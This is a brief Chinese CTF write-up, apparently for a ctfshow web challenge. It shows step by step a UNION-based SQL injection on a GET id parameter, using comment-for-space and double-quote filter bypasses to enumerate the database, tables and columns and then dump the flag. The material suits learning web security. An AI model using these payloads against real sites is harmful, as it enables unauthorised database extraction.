打开靶机
打开每一个列表,发现有一个id,所以为get传参
ok,找一下注入点
-2/**/union/**/select/**/1,2,3#
这里发现过滤了空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3
下面开始查库吧!
-2/**/union/**/select/**/1,database(),version();#
库名:web7
版本: 10.3.18-MariaDB
查表:
-2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
三张表: flag,page,user
这里我们看一下flag的字段名:
-2/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.column/**/where/**/table_schema=database()/**/and/**/table_name="%27flag%27"#
并无结果,发现单引号被转化成了%27,所以这里过滤了单引号,但双引号发现并未被过滤,所以用双引号进行绕过
id=-2/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="flag"),3#
字段名:flag
直接查flag:
-2/**/union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/flag),3#
ctfshow{794e88a5-50c0-4a73-847c-9f2f596c3980}
over!!